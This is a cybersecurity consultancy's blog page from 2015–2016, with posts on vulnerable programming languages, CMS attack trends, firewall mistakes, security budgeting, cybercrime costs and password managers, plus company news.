Blog

Blog

5 Common Programming Languages That Cause the Most Software Vulnerabilities

Posted by Nik • Feb. 4, 2016 • 0 Comments

Over the last couple of years, many cybersecurity problems have come to light. There has been a wave of WordPress and Drupal vulnerability warnings and patches, and SQL injection bugs are being found left and right in Web applications. Many of the bugs can be traced back to PHP, but other common programming languages can also cause vulnerabilities. Using cloud-based scans and code analysis of more than 50,000 applications over 18 months, Veracode found that the following five programming languages cause the most software vulnerabilities.programming languages


1. PHP

Unlike .NET and Java, PHP doesn’t have built-in functions to reduce the risk of buffer overflows, which is partly why it’s so hard to program securely in PHP. According to Veracode, 86 percent of applications written in PHP contain at least one cross-site scripting (XSS) vulnerability, while 56 percent come with at least one SQL infection bug. Although SQL injection bugs are one of the most abused vulnerabilities, they’re also the easiest to fix. Work with a security consultant to keep your PHP applications safe.


2. Classic ASP

Like PHP, Classic ASP has no built-in functions to reduce the risk of buffer overflows, which hackers can exploit to steal data. Veracode found that 64 percent of applications written in Classic ASP contain at least one SQL injection bug.


3. ColdFusion

ColdFusion applications are the next most vulnerable, with 62 percent of them having at least one SQL injection bug. SQL injection is a type of attack where attackers use input text boxes to execute SQL commands that give them access to the backend database.


4. .NET

Typically taught as part of computer science courses, .NET contains built-in security functions. However, 29 percent of .NET applications still contain at least one SQL injection bug. A network security consultant can identify the risk of this kind of bug and implement solutions to lock attackers out.


5. Java

Like .NET, Java is commonly taught in computer science courses and contains built-in security functions. Veracode found that 21 percent of Java apps have at least one SQL injection bug, which means that a significant number of sites are at risk of attack.

Could your Web apps contain security vulnerabilities? No matter what programming language you use, a cybersecurity consulting service can help you identify risks and make your applications safer. Get in touch with Garland Heart to find out how we can help you stay safe.
 
Free eBook. Reduce cybersecurity risk in your financial institution. Download now.

Topics: IT, cybersecurity, Security

WordPress and Health Applications Are Now the Most Popular Web Attack Targets

Posted by Nik • Jan. 19, 2016 • 0 Comments

Research shows that WordPress and health applications are the most popular targets for online attacks. If you’re currently using WordPress for your website or offering a healthcare app, here are some key facts and figures you should know.blogging platform content management system

 

Content Management Systems Are Most Vulnerable

A new report by Imperva revealed that content management systems (CMSes) like WordPress, Drupal and Joomla were attacked three times more often than other web applications. They’re often targeted by remote command execution (RCE) attacks. Out of the most popular CMSes, WordPress is a particularly favorite mark of hackers.

Hackers use plug-ins to break into CMSes. With more than 30,000 plug-ins, each with their own weaknesses, WordPress is especially vulnerable to this kind of attack. WordPress is also five times more likely than other CMSs to be hit by remote file inclusion (RFI) attacks.

 

Open-Source Frameworks Come With Increased Exposure

Developers in open-source frameworks are constantly generating new plugins and add-ons, without much dedicated focus on security. Although this kind of environment is exciting to work in, the fast pace of development increases the vulnerabilities of CMS applications – particularly WordPress, which is based on PHP. Hackers can sometimes exploit security weaknesses in PHP to attack sites built using the WordPress platform.

 

Healthcare Apps Also a Concern

Many healthcare apps are targeted by cross-site scripting (XSS) attacks, in which hackers try to insert their own scripts into an app or webpage. Fifty-seven percent of attacks against health apps are XSS attacks, with many hackers trying to hijack sessions to steal personally identifiable information. When conducting vulnerability assessments for your healthcare app, remember to consider the possibility of an XSS attack successfully accessing your users’ data.

 

Get Help When You Need It

Although healthcare apps and CMSes present security risks, there are steps you can take to protect yourself. If you use WordPress for your website, for example, ensure your plug-ins come from a verified developer and be careful about the information you put into your WordPress database. If you need more help to stay safe, contact Garland Heart to find out how our cyber security consulting services can protect you. 

Topics: Info Security, IT, cybersecurity, Security, Healthcare

Is There a Generation Gap in Cybersecurity?

Posted by Gaye Connell • Jan. 15, 2016 • 0 Comments

According to a recent survey by Raytheon and the NCSA, young people ages 18 to 26 aren't pursuing careers in cybersecurity. Young women - who make up just 10 percent of the industry's workforce - are even less interested in cybersecurity than their male counterparts, with 52 percent of millennial women saying cybersecurity programs aren't available to them in school. Only half of millennial men and one-third of millennial women understand what cybersecurity jobs even entail.355b160e.jpeg

 

Why Aren't Millennials Drawn to the Industry?

The results of the survey suggest young people simply aren't getting proper information about cybersecurity in college. Meanwhile, a lack of entry-level cybersecurity jobs limits opportunities for recent graduates. It's difficult for a new grad to find a job as a network security specialist when they don't have industry experience, but it's also challenging to earn that experience when entry-level opportunities are so limited. It's a catch-22.

 

Cybersecurity Firms Must be More Welcoming to Entry-Level Individuals

To avoid a generation gap in cyber security consulting, companies must encourage more diversity within their organizations. Offering apprenticeships and internships can help attract young people to the industry, as can free cybersecurity tools and workshops for students. If companies want a pool of fresh talent to draw upon when their current security consultants retire, it's essential they actively offer knowledge, time and support to those who are interested in working in the information security field.

 

Is Your Company Looking to Hire?

Awareness of the cybersecurity generation gap is essential if your company is looking to hire or develop internal talent. Consider providing more advocacy or support for young people in your workplace. If the generation gap in cyber security consulting is allowed to continue, it could reduce the amount of overall talent in the workforce - and drive up the cost of hiring a security consultant or network security specialist with the necessary education and skills.

 

Mentoring the Next Generation

If you're not sure what you can do to address the cybersecurity generation gap and help millennials become more interested in the field, get in touch with Garland Heart. We can provide information about the current state of the industry and put you in touch with a young security consultant looking for an opportunity to shine.

Free eBook. Reduce cybersecurity risk in your financial institution. Download now.

Topics: Info Security, cybersecurity, Corporate

4 Common Mistakes in Firewall Configuration

Posted by Nik • Jan. 13, 2016 • 0 Comments

A firewall is a great way to protect your organization, but it only works well if it is configured properly. Here are four common mistakes in firewall configuration, along with some tips for avoiding them.firewall configuration

 

1. Non-Standard Authentication Methods

Using non-standard authentication methods can put you at risk of a cybersecurity breach. When you don't use a standard method, you rely entirely on the expertise of whoever set up the firewall, or worse, on the default settings of the firewall. A better approach is to adhere to a recognized standard to give your computer network security a stronger foundation. 

Without a single standard authentication method, problems can arise when staff attempt to log in from different devices and locations. For example, a non-standard authentication method could allow weaker passwords or place less-strict limits on the number of login attempts. These security problems create opportunities for attackers to break into your network.

If your company has multiple locations or remote offices, ensure all locations follow the same standard authentication method. This will help to eliminate weak spots in your computer network security.

 

2. Open Policy Configurations

Firewalls that allow traffic from any source to any destination pose a security risk. IT teams often use open policy configurations when they aren't sure what they need, since starting with broad rules makes it easy to tweak firewall configurations later. However, too many IT teams never get around to defining more specific firewall policies, leaving the network exposed to risks.

Your IT team should give the minimum level of privilege that users and services need to function normally. Regularly revisit firewall policies to find out how applications are being used, so you can reassess the privileges they need.

 

3. Risky Management Services

Leaving unnecessary services running on the firewall compromises security. Common offenders are dynamic routing and rogue DHCP servers that distribute IP addresses, which can lead to IP conflicts.

Once again, the solution is to follow the principle of granting the lowest level of privileges required for the services to function. Configure devices based on the functions you need them to complete, since allowing too many services to run adversely affects performance and increases network load.

 

4. Failure to Log Outputs From Security Devices

Logging outputs from security devices means you'll be alerted if you're under attack. You can also use logs to investigate the breach. Finally, you can review the logs to help you develop better risk management solutions. Focus on logs for admin accounts, non-business hours, remote accounts and other high-risk areas to spot red flags.

Need help configuring your firewall? Contact Garland Heart today to find out how we can help.

Free eBook. Reduce cybersecurity risk in your financial institution. Download now.

Topics: Info Security, cybersecurity, Security

Your 4-Step Guide to Security Budget Planning for 2016: Part 2

Posted by Gaye Connell • Dec. 28, 2015 • 0 Comments

Once again, it’s time to plan your security budget for the next year. In our last post, we discussed planning and implementing as the first two steps of planning your 2016 security budget. Now, let’s look at the final two steps: execution and analysis.security budget planning

 

Execution

Successful execution of a security plan involves detecting new risks and monitoring the enforcement of security policies. Is your system configured to enforce the policies you put in place during steps one and two? Ideally, your system should allow you to identify, understand and address any potential threats on a daily basis.

The people in your organization are a great asset in the fight against security risks, but they can also be your biggest risk. Even the most advanced technology and carefully designed security controls rely on some amount of human interpretation and execution. In order to make the most of the time and money you have spent implementing security processes, you need to educate your team so that they are able to manage and maintain the secure environment you have created, both now and as the business grows.

Note that sometimes a new application or “automated” process can reduce time, but often the application still requires the same amount of time or staffing to execute. Make sure you understand the full input needed to get the desired result!

When allocating funds for monitoring security processes, consider the following security concerns: 

  • Unused, generic, default, or shared user profiles
  • Programs that don’t match known updates
  • Suspicious activity on company networks, possibly indicating an intrusion attempt (ex. remote access or administrator/maintenance accounts)

Always look for opportunities to educate your customers and clients and consider whether you need to bring in external audit or security consulting services as your business grows.

 

Feedback and Analysis

Finally, you need to make sure that your security policies are actually working in the way you intended. Comparing the security enforcement that occurs in your organization to that laid out in your security policies is a key stage in IT risk management.

Internal testing and inspecting can help to check how accurately security practices in your organization match those defined in your policy. External audits are also useful, as they can take an objective view of your organization and the people working within it.

If you have an upcoming security audit, you will need to set aside part of your budget to prepare for and conduct the audit, as well as some extra money to respond to the audit findings. Remember to plan this into your 2016 budget so that you aren’t left with a shortfall.

If you’re left still trying to justify expanding your IT or security budget, the example of health or life insurance comes to mind. As your grow older or more mature, the realization of the impact to your personal or family life becomes more important. So the need to add or increase those services becomes more valuable than the potential cost of not taking any action. With the continued integration and reliance of technology that makes our lives easier, it also continues to increase the magnitude of negative impact.

 

If you need to consult a network security specialist to help you execute and evaluate the enforcement of your security policies, get in touch with Garland Heart today. Our expert network security specialist teams can help you to ensure that your organization is following good security practices that can help keep your systems safe.

 

Topics: IT, Security, Legal, Finance, Retail, Corporate

Your 4-Step Guide to Security Budget Planning for 2016: Part 1

Posted by Nik • Dec. 22, 2015 • 0 Comments

You don’t have to be overwhelmed planning your IT risk management for 2016. Simply follow the four steps outlined over these two posts to create your 2016 budget. 

security budget planning

Planning

First, define the security policies and controls that you’ll use to protect your company’s assets. As an example, you might implement the security policy “employees must change their passwords every 60 days” to protect your company. Your policies must meet standards and regulations such as HIPAA, SOX, FFIEC, GLBA, ISO 27001 and NIST.

It’s important to align the environment and culture in your organization with the policies you choose. Educate your teams to make sure they understand your company’s security aims and the methods to keep everyone safe. Understand the expenses that each department faces relating to security and allow for them in your budgeting.

As well as meeting the required standards or regulations for your industry, you also need to understand the standards that your client wants your organization to meet. If clients are required to hold your organization accountable to certain standards, you could face unforeseen expenses. Therefore, it is essential to understand these requirements from the outset.

Ask yourself the following questions about your security plans in 2016 and allocate money accordingly: 

  • Do you have explicit security policies that are formally documented?
  • What industry standards or government regulations do you need to comply with?
  • Have any standards or regulations changed since last year?
  • Do any existing policies need to be changed?
  • Have we as an organization looked at what security or regulatory requirements our clients and/or customers?

 

Implementation

After the initial planning stage, you need to think about how you’ll use your 2016 budget to enforce your security policies. Use the Pareto principle: 20 percent of attacks cause 80 percent of damage, so you should focus on tackling these threats first. 

At Garland Heart, we typically see security budgets of between 4 and 15 percent of a company’s total revenue. With such variation within the industry, there are ways to leverage strong IT risk management while reducing or maintaining costs in your organization. Many companies find that hiring the services of an external network security specialist can be a cost effective way of managing security risks, as it frees up the time of your internal staff so they can concentrate on their day-to-day responsibilities. Other ways to prioritize your implementation dollars is by simply risk rating the areas of potential loss, fraud, operational impact and/or business impact based on threats and regulatory obligations for your business. An analysis of previous unexpected costs and IT/operational efficiencies is also helpful. Security experts like Garland Heart can help you to use your existing security products to effectively enforce your policies.

Get in touch with Garland Heart today to find out how we can help you make the most of your 2016 security budget. Check out Part 2 of our 4-Step Guide to Security Budget Planning for 2016 to get more tips.

 

Topics: Security, Legal, Healthcare, Finance, Retail, Corporate

New Study: Cybercrime Costs Organizations $15 Million on Average Per Year

Posted by Gaye Connell • Dec. 21, 2015 • 0 Comments

A 2015 study by HP found that the average cost of cyber crime has grown to $15 million per year, which is an increase of 82 percent over the last six years. In the companies featured in the study, costs ranged between $1.9 million and a massive $65 million per year. With such large potential costs, it is vital to take action to protect your business from all forms of cyber crime. cost of cybercrime

 

What are the Highest Risk Threats?

The most costly cyber crimes are denial of service attacks and attacks arising from malicious insiders and malicious code. In combination, these three types of cyber attacks account for more than half of all cyber crime costs. The average cost of cyber crime over a 46-day resolution period is more than $1.9 million, which is an increase of 22 percent since last year.

Malicious insider attacks usually take the longest to resolve, which can lead to a large build-up of costs. Information theft accounts for most of the external costs associated with cyber crime, whereas recovery and detection are the most costly internal activities. It is vital to protect your organization against risks posed by malicious agents both inside and outside the organization and to keep your clients’ information safe.

 

How Can Your Company Prepare Against Cyber Crime?

According to the recent HP study, using a security information and event management (SIEM) solution can reduce cyber crime costs by an average of $3.7 million. A comprehensive SIEM solution combines software and services that aid in detecting and responding to security breaches. Skimping on SIEM is likely to backfire, leading to higher cyber crime costs, whereas proper budgeting for security can save an average of $2.8 million on attack management costs. 

In the past, companies were able to get away with piling security responsibilities onto internal staff, but as the complexity of technology increases, staff are no longer able to manage all the security risks faced by a company. As a result, businesses are starting to realize that they need to call in experts to support their internal staff. Not only can a network security specialist provide more comprehensive and reliable security support, but their services also free up internal staff, allowing them to focus on their day-to-day responsibilities within the business.

 

Calling in the Experts to Reduce Cyber Crime Costs

Businesses that employ a cybersecurity consulting service can save as much as $2.1 million on the cost of cyber crime every year. If you want to know how cybersecurity consulting could help reduce cyber crime costs in your organization, get in touch with Garland Heart today for a consultation.

Topics: cybersecurity, Security, Corporate

Merry Christmas

Posted by Brad Garland • Dec. 18, 2015 • 0 Comments

All of us at Garland Heart would like to wish you all a Merry Christmas and would like to thank our clients for their support during this very busy and productive 2015 year.

We will be all taking some time off the week of December 28th to spend time with our friends and family.  Business will reopen on January 4th.   

Here is our annual video and we hope it will put a smile on your face, as well as get you in the mood to finish your Christmas shopping. 

 
 
 
 
 
 
 
 

 

6 Secure Password Management Systems for Your Business

Posted by Nik • Dec. 18, 2015 • 0 Comments

Protecting the passwords of all your employees is a key part of IT risk management. Password management systems, in combination with other cybersecurity systems, can help to protect workers from becoming victims of hacking. Here are six of the best secure password management systems for businesses.secure password management

Dashlane Premium

Dashlane Premium is available for a wide variety of devices, including iOS and Android mobile devices, as well as desktop PCs and Macs. This password management system manages keys carefully, keeping users’ passwords secure. It also features a password generator, which you can use to create random and complex passwords for all applications. When an employee changes a password, Dashlane Premium automatically syncs the new password to all team members and their devices. It can even issue breach alerts to let you know when you need to change passwords due to a security breach in a service you use. On the security dashboard, you can see weak and reused passwords so you can quickly take action to change them. Dashlane Premium costs $39.99 per year for each user.

 

LastPass Enterprise

Many large companies rely on LastPass Enterprise as part of their IT risk management strategy. Available in 17 languages, this password-management system runs on most platforms. It issues breach alerts to let you know when you should update your passwords, identifies weak and duplicate passwords and also generates compliance reports for your organization. LastPass Enterprise is also cost-effective for large organizations: the standard price is $24 per user per year, but discounts increase with the number of users. You can access a free 14-day trial for up to 10 users to try the software out. Note that although LastPass suffered a data breach in June, no passwords were compromised during the attack.

 

Team Password Manager

If you’re looking for open-source computer security systems, try Team Password Manager. Available for free for up to two users, $99 for five users and $2,999 for unlimited users, Team Password Manager can be cost-effective for both very large and very small organizations. One nice feature of this software is its use of ‘projects,’ which allow teams of users to access passwords they need for collaboration. It also has a password generator, which can suggest secure passwords based on random letters, numbers and symbols.

 

CommonKey

If you need a password management system for a small team, consider CommonKey. Designed to facilitate shared access to web services, CommonKey is free for up to three users, with a charge of $2 per month for each additional user. It features a password generator, as well as simple user provisioning and de-provisioning.

 

Meldium

Meldium manages passwords for many cloud services, including Google Drive, DropBox, WordPress and Salesforce. Furthermore, it can integrate with Google Authenticator and LogMeIn ID. Meldium costs $24 per month for up to 20 users, $79 per month for up to 100 users and $169 per month for up to 250 users. Account provisioning is only available in the premium version.

 

Zoho Vault

Only available for iOS and Android mobile devices, Zoho Vault is free for personal use but comes with a charge of $4 per user per month for the professional version. Administrators get a wide range of features, including the ability to create and manage user groups, restrict access by IP, transfer password ownership and create reports on users. There is also a password generator and the ability to import passwords from other password managers. 

To find out more about computer security systems, including password management systems, get in touch with Garland Heart today.

 

Topics: IT, Security, Corporate

Garland Heart obtains the Best Christian Workplace Institute award for the 3rd year in a row!

Posted by Brad Garland • Nov. 13, 2015 • 0 Comments

BCI_Certified_2016_Clear_2The importance of our culture and how we work is something that means a great deal to me. As a company, we choose to spend time debating and cultivating our workplace as we grow. We know there will be changes along the way, people that come and go, and different business problems we get to face every year. This is why we began using, three years ago, the Best Christian Workplace Institute’s survey of all our staff to have a measurement of where we are each year. We had all our employees take the survey again this year and are delighted to hear that we obtained the 2016 Best Christian Workplace Institute Award for great places to work. We are proud of this honor and look for ways to get better each time around. No culture is perfect (and ours is certainly not) but leveraging a tool like the BCWI to measure our success has been extremely helpful in creating an open, performance drive, and dare I say, fun place to work.

"Garland Heart has developed a remarkably flourishing employee culture placing them in the top 10% of product and service organizations in our survey database.  Staff communicate how much the leadership cares about its staff and clients.  Their employees indicated they feel highly involved in decisions that impact their work.  They are a great example an organization that lives its values.” - Al Lopus, President of BCWI

Subscribe to our Newsletter to receive Regulatory News and Company Updates: